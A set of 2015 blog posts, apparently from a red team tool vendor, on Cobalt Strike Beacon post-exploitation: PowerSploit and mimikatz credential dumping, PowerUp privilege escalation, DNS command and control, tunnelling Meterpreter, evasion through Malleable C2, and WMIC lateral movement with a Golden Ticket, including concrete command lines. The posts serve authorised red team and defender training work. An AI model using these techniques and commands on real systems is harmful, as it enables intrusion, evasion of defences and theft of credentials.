h1

My Favorite PowerShell Post-Exploitation Tools

February 25, 2015

PowerShell became a key part of my red team toolkit in 2014. Cobalt Strike 2.1 added PowerShell support to the Beacon payload and this has made an amazing library of capability available to my users. In this post, I’d like to take you through a few of my favorite collections of PowerShell scripts.

beaconpowershell

PowerSploit

Let’s start with PowerSploit. This is a post-exploitation toolkit originally put together by Matt Graeber with contributions from Chris Campbell, Joe Bialek, and others. When I use Beacon, this toolset is almost a drop-in replacement for features that I would normally need Meterpreter to get to.

For example, if I want to use mimikatz to dump plaintext credentials, I simply import the Exfiltration/Invoke-Mimikatz.ps1 script and call the Invoke-Mimikatz cmdlet. Simple.

PowerSploit also features several great tools to steal credentials in other ways, log keystrokes, and take screenshots.

PowerUp

Every Christmas, I ask Santa for a privilege escalation vulnerability scanner. This has long made sense to me. When I have access to a system, I am in a good position to conduct automated reconnaissance and identify a known weakness to elevate with. Will Schroeder answered my wish with the PowerUp tool. This PowerShell script interrogates the system in several ways to find a privilege escalation opportunity. It even offers some helpful cmdlets to help you take advantage of the misconfigurations and weaknesses it finds. To use PowerUp I just import PowerUp.ps1 into Beacon and run the Invoke-AllChecks cmdlet.

PowerView

Last in my list is PowerView (also by Will Schroeder). This script is a full toolkit to interrogate a domain for hosts, users, and complex trust relationships. I probably use less than 10% of its potential capability right now. I tend to use PowerView to list hosts on a network and to quickly find out where I may have admin rights with my current token. This has become one of my first network reconnaissance tools and it has eliminated a need to scan for targets in many cases. My favorite PowerView cmdlets are Invoke-Netview and Invoke-FindLocalAdminAccess.

h1

Another Night, Another Actor

February 19, 2015

Earlier last year, I had a frantic call from a customer. They needed to make a small change to Beacon’s communication pattern and quickly. This customer was asked to spend a week with a network defense team and train them on different attacker tactics. Each day, my customer had to show the network defense team all of their indicators and walk them through each of their activities. After a few days, this network defense team was able to zero in on Cobalt Strike’s Beacon and they were having trouble conducting other types of training activity because of this.

A blue training audience gets the most benefit from a red team’s activity when the red team shares their indicators, tactics, and knowledge with them. Clear indicator information allows the blue team to look at their sensors and see what they missed when they tried to put the story together. An open discussion of favored tactics (e.g., ways to do lateral movement, techniques like the Golden Ticket, etc.) allows a blue team to address major gaps in their defenses.

For red teams, openness comes at a cost. Tools and capabilities are expensive to buy or time-consuming to build. A red team’s effectiveness comes down to skilled operators and tools that give them freedom to work in a network. You need both. A poor operator will misuse a good tool. Depending on the maturity of the training audience and environment, a skilled operator may find themselves completely unable to operate without good tools to support them.

When a red team gives up all of their operating information, they’ve given their training audiences a gift-wrapped roadmap to detect their activity now and into the future. It’s a lot harder to play the role of an unknown adversary when your tools are well understood by the training audience.

To deal with this problem, most red teams choose to keep information about their tools and tactics close hold. They’re relying on a strategy of obscurity to protect their investment and to extend the productive life of their current technologies. This is at direct odds with what a red team should offer.

I think about this problem a lot. I sell a public solution that allows red teams to operate. I do not have the luxury of obscurity. I also don’t want obscurity. I want the training audiences I work with to get the most benefit possible from the red team activity my customers and I conduct. This means my customers need to feel safe disclosing details about their operations and their use of my tools.

I’ve made some headway on this problem and it’s one of the things in Cobalt Strike I’m most proud of.

On-disk, Cobalt Strike has its Artifact Kit. This is my source code framework to build all of Cobalt Strike’s executables and DLLs. My customers get the source code to this framework and they have the freedom to change this process and introduce other techniques to evade anti-virus. Cobalt Strike also plays nice with the Veil Evasion Framework. It’s trivial to export one of Cobalt Strike’s proprietary stagers in a Veil-friendly format too.

Network indicators are another story. Once a blue team understands what your tool looks like on the wire, it’s generally game over for that capability. Cobalt Strike has a good handle on this problem too. Malleable C2 lets Cobalt Strike’s end-users change Cobalt Strike’s indicators on the wire.

Specifically:

You get to transform and define where in a POST and GET transaction Beacon stores its metadata, output, and tasks. If you want to base64 encode an encrypted task and wrap it in HTML you’re welcome to do that. If you want to stick your encrypted tasks in the middle of an image, this is trivial to do too.

You get to dress up your transaction with extra indicators. You can add whichever client and server headers you want to HTTP POST and GET transactions. You can add arbitrary parameters to your GET and POST requests. You also get to define the URLs used for each of these.

These two pieces combined together give you a lot of control over what Cobalt Strike’s Beacon looks like on the wire. If you want, you can look like known malware. Or, you can blend in with existing traffic. Or, do something in between to adjust your activity to what your training audience is ready for.

Now, what about that customer? Sadly, Malleable C2 didn’t exist at the time of that call. We were able to figure out a one-off work-around for their situation. Today it’s a different story. Between Artifact Kit and Malleable C2, it’s quite feasible to make Cobalt Strike look like a new actor. You can do this on a weekly or even daily basis, if you need to. This flexibility is a big step towards resolving the openness versus future effectiveness conflict.

h1

DNS Communication is a Gimmick

February 4, 2015

I added DNS Communication to Cobalt Strike in June 2013 and refined it further in July 2013. On sales calls and at conferences I get a lot of questions and compliments on this feature. That’s great.

I’ve also heard the opposite. I’ve heard folks say that DNS Command and Control is noisy. It’s “easy to detect”. I’ve had someone go so far as to say that it’s a gimmick.

I have a philosophy: I like options. I have a preferred way to work. I stay aware of how this preferred way may break down. When this happens, I like to know I can still work and get things done. Cobalt Strike’s DNS C2 is a great example of how this philosophy influences my development choices.

I released Beacon in the 27 Sept 2012 release of Cobalt Strike. This first Beacon could beacon over DNS or HTTP. The DNS beacon would periodically make an A record request to a domain that I, the attacker, am authoritative for. My server would provide a response that told the Beacon whether or not it should make an HTTP request to download its tasks. I built this Beacon for stealth. By checking for requests with DNS, I limit how often my compromised systems need to connect directly to me.

dnscomms2

The above is not easy to detect. I’ve had folks tell me that they see this behavior in production. One A record request every 24-hours or week is not trivial to find. This is scary.

In the first half of 2013 I had several opportunities to use Cobalt Strike. I took advantage of the DNS Beacon as a persistent agent. During this time I ran into a scenario I call “the child in the well”. I would see a compromised host beacon, but it would never connect to me to download its tasks. This is a terrible situation. My compromised system can call out to me. I know it’s there. But, I can’t reach it. This happened to me twice and I knew I needed to do something about it.

I added a mode command to the DNS Beacon. This command allows the end-user to state which data channel Beacon should use to download its tasks. When a tasking is available, I communicate this channel preference to the DNS Beacon in my 4-byte A record response.

I added modes to communicate over HTTP, DNS A records, and DNS TXT records. Each of these channels has their purpose and I allow the user to switch back and forth between them for each deployed DNS Beacon.

The HTTP data channel is the default. The compromised system connects to me with a GET request to download its tasks. It uses a POST request to send output when it’s available.

If I run into a child in the well scenario I have a choice between the two DNS data channels.

I used to use Beacon primarily as a lifeline to send sessions to other team servers. The A record channel is in the spirit of this original use case. I can task the Beacon and it will download its tasking 4-bytes at a time. If the system can Beacon to me, then I have some option to control it. The A record data channel isn’t efficient, but it works in a pinch.

I added the TXT record channel at the same time I built a SOCKS proxy server into Beacon. This was July 2012. I built these capabilities into Beacon to keep with an offense in depth philosophy. If I can’t get out of a network on any channel, except DNS, I need a way to continue to work. I saw pivoting as essential to this and so I built the SOCKS proxy server. The TXT record channel is suitable for tunneling some traffic through a Beacon.

I hope this post helps shine light on how I use DNS for covert communication. As a beacon with a high sleep time–it’s stealthy. As a data channel, it’s useful when there are no other options. Which option makes sense will depend on your context. The ability to rationalize context to tool comes from mature tradecraft.

h1

How I tunnel Meterpreter through Beacon

January 28, 2015

I write so many blog posts about Beacon, I should just give up and call this the Beacon blog. Beacon is Cobalt Strike’s post-exploitation agent that focuses on communication flexibility and added covert channels.

It’s also possible to tunnel Meterpreter through Beacon with the meterpreter command. In this blog post, I’ll explain how this feature works.

a3

Beacon exposes a SOCKS proxy server to allow the Metasploit Framework and third-party tools to pivot through a Beacon. Each time Beacon checks in, data to write to and data read from ongoing connections is exchanged.

When you type ‘meterpreter’ in a Beacon, two things happen. First I generate a task to make the Beacon check-in multiple times each second. I call this interactive mode. Next, I issue a task that injects a bind_tcp stager into memory on the target. This stager binds to a random high port on 127.0.0.1. A lot of host-based firewalls ignore activity to services bound to localhost.

Once the above steps are complete, Cobalt Strike’s C2 server gets a response from the Beacon stating it’s ready to stage the Meterpreter payload. I stand up a one-time-use SOCKS-compatible port forward. This port forward ignores the client’s specification about which host to connect to. It always connects to 127.0.0.1. I do this because I want the Metasploit Framework to associate the Meterpreter session with the hosts IP, but I want it to stage to localhost.

I then start exploit/multi/handler for windows/meterpreter/bind_tcp. I configure this module to use my SOCKS-compatible port forward with the Proxies option. The Proxies option in the Metasploit Framework allows me to force an outbound Metasploit module through an arbitrary SOCKS proxy. I set RHOST to the IP address of my target.

The handler for Meterpreter bounces through my port forward to hit the bind_tcp stager I put into memory earlier. The payload stages over this connection and then the stager passes control to the Meterpreter payload with the same socket in the EDI register [a detail managed by the stager and the stage].

At this point, I have a Meterpreter session that tunnels through Beacon. Better, I have this session without interference from a host-based firewall (if there is one).

h1

Cobalt Strike 2.3 – I’ve always wanted runas

January 22, 2015

Cobalt Strike 2.3 is now available. This release adds a runas command to Beacon. This command allows you to specify a username and password for any user and run a command as them. Useful for situations where you know credentials for an admin and want to use them to elevate. Care to know the alternative? Shell Escalation using VBS (pg. 31, Red Team Field Manual) is what I used to do.

This release also adds a Cobalt Strike version of the PowerShell Web Delivery tool. This tool hosts a PowerShell script on Cobalt Strike’s web server that injects a Cobalt Strike listener into memory. This feature also generates a PowerShell one-liner that you may run on a target to get a session.

Finally, this release addresses an incompatibility that affected DNS Beacon users. Updates to the Metasploit Framework affected Cobalt Strike’s process to encode a stage to deliver over DNS. Cobalt Strike now includes its own encoder to build the DNS Beacon stage.

For a full list of changes, please consult the release notes. Licensed users may get the latest with the built-in update program. A 21-day trial of Cobalt Strike is available too.

h1

Indecent (Penetration Testing) Proposal

January 14, 2015

A customer reaches out to you. They’ve spent the money. They have a network defense team that innovates and actively hunts for adversary activity. They own the different blinky boxes. They have a highly-rated endpoint protection in their environment. They’re worried about these cyber attacks they see in the news. Despite this investment, they don’t know how well it works. The CEO thinks they’re invincible. The CISO has his doubts and the authority and resources to act on these doubts. They want to know where their program is at. They call you.

You run through the options. You dismiss the idea of looking at their vulnerability management program. They have this and they receive penetration testers on a semi-regular basis. They’re comfortable that someone’s looking at their attack surface. They’re still worried. What about something very targeted? What if someone finds a way that they and the myriad of vendors they worked with didn’t know about.

After discussion, you get to the heart of it. They want to know how effective their network defense team is at detecting and mitigating a successful breach. The gears start to turn in your mind. You know this isn’t the time to use netcat to simulate exfiltration of data. You can download some known malicious software and run it. Or, better, you could go to one of the underground forums and pay $20 for one of the offensive showpieces available for sale. Your minded quickly flashes to a what-if scenario. What happens if you go this way and introduce a backdoor into your customer’s environment. You shake your head and promise yourself that you will look at other options later.

Wisely, you ask a few clarifying questions. You ask, what type of breach are they worried about? Of the recent high-profile breaches, what’s the one that makes them think, “could that be us?” Before you know it you’re on a plane to New York with a diverse team. You bring an offensive expert from your team, she is a cross between operator and developer. You also bring a new hire who used to work as a cyber threat analyst within the US intelligence community. You engage with the customer’s team, which includes trusted agents from the network defense team who will not tell their peers about the upcoming engagement. The meeting is spent productively developing a threat model and a timeline for a hypothetical breach.

Your customer introduces you to another player in this engagement. Your customer pays for analyst services from a well known threat intelligence company. This company is known for working intrusion response for high-profile breaches. A lesser known service is the strategic guidance, analysis support, and reports they provide their customers on a subscription basis. This analyst briefs you on a real actor with capability and intent to target a company like your customer. The hypothetical breach scenario you made with your customer is amiable to this actor’s process. The analyst briefs your team on this actor’s capabilities and unique ways of doing business. Your customer doesn’t know what they want here, but they ask if there’s a way you can use this information to make your activity more realistic, please do so.

You and your team leave the customer’s site and discuss today’s meetings with a fast energy. The customer wants to hire you to play out that hypothetical breach in their environment, but they want to do this in a cost effective way. A trusted insider will assist you with the initial access. It’s up to you to evade their blinky boxes and to work slowly. Paradoxically, the customer wants you to work slow, but they want to put a time limit on the activity as well. They’re confident that with unlimited time, you could log the right keystrokes, and locate the key resources and systems in their network. To keep the engagement tractable, they offer to assign a trusted agent to your team. This agent will white card information to allow you to move forward with the breach storyline.

The customer’s interest is the hypothetical breach and the timeline of your activity. They don’t expect their network defense team to catch every step. But, they want to know every step you took. After the engagement, they plan to analyze everything you did and look at their process and tools. They’ll ask the tough questions. How did they do? What did they see, but dismiss as benign? What didn’t they see and why? Sometimes it’s acceptable that an activity is too far below a noise threshold to catch. That’s OK. But, sometimes, there’s a detection or action opportunity they miss. It’s important to identify these and look at how to do better next time.

You look at this tall order. It’s a lot. This isn’t something your team normally does. You know you can’t just go in and execute. Your new hire with the intel background smiles. This is a big opportunity. Your developer and analyst work together to make a plan to meet the customer’s needs. Your intent is to execute the breach timeline but introduce tradecraft of the actor the threat intelligence company briefed you on. These few tricks you plan to borrow from the actor will show the customer’s team something they haven’t seen before. It will make for a good debrief later.

This engagement will require some upfront investment from your team and it may require a little retooling. You’ll need to analyze each piece of your kit and make sure it can work with the constraints of your customer’s defensive posture. You verify that you have artifacts that don’t trigger their anti-virus product. Some of the cloud anti-virus products have made trouble for your team in the past. You look at your remote access tool options. You need a payload that’s invisible to the blinky boxes and their automatic detection. If you get caught, you want to know ingenuity and analysis made it happen. You won’t give yourself up easily. At least, not in the beginning.

You also want to know that you can operate slowly. Your favorite penetration testing tools aren’t built for this. Big questions come up. How will you exfiltrate gigabytes of data, slowly and without raising alarms? You know you’ll need to build something or buy it. You also work to plan the infrastructure you’ll need to support each phase of the breach timeline. You know, for this particular engagement, it makes no sense to have all compromised systems call home to the one Kali box your company keeps in a DMZ.

As all of this planning takes place, you pause and reflect. You got into this business to make your customers better. You built a team and you convinced your management to pay them what they’re worth. You carry the weight of making sure that team is constantly engaged. Sometimes this means taking the less sexy work. Unfortunately, your competitors are on a race to the bottom. Everyone sells the same scans and vulnerability verification as penetration tests. It keeps getting worse. You know you’ll lose your best people if you try to compete with this way. This engagement brings new energy to your team.

This mature customer is willing to pay for this service. The value to them is clear. They want to know how well their security operations stands up to a real world attack. They understand that this is a task that requires expertise. They’ll pay, but they can’t and won’t pay for a long timeline. The white carding is the compromise.

You’re excited. This is something that will use the expertise you’ve collected into a cohesive team. Your customer appreciates how real the threat is. You make plans. Big plans. You wonder who else might pay for this service. You go to your sales person and brief them on the customer and this engagement. Your sales person nods in agreement. “Yes, I see it too”.

h1

Pass-the-(Golden)-Ticket with WMIC

January 7, 2015

One of my favorite blog posts from last year was the Adversary Tricks and Treats post from CrowdStrike. They showed how one of the actors they track changed their tactics to cope with a more alert defender.

This actor, DEEP PANDA, sometimes injects a Golden Ticket onto their local Kerberos tray. To move laterally, this actor uses this trust to enable the RDP sticky keys backdoor on target systems. The actor then RDPs to the target and uses this backdoor to get a SYSTEM level command shell. Nothing to it.

When I read about interesting tradecraft, I like to reproduce it in a lab. According to CrowdStrike, this actor uses wmic to pass the Golden Ticket and execute their commands on the target systems.

I stood up a test system and used kerberos_ticket_use in Beacon to ingest a Golden Ticket. I then tried to execute a command on a Windows 8 system with WMIC:

wmic /node:WIN8WORKSTATION process call create “stuff I want to run”

This command failed with an access denied. Picture a Sad DEEP PANDA face here. After some digging, I found that there’s a flag I need to specify. To pass a Kerberos ticket with WMIC, use /authority:”kerberos:DOMAIN\TARGET” on your WMIC command line. So in this case:

wmic /authority:”kerberos:CORP\WIN8WORKSTATION” /node:WIN8WORKSTATION process call create “stuff”

That’s how you pass a Golden Ticket with WMIC.

Follow

Get every new post delivered to your Inbox.

Join 14,729 other followers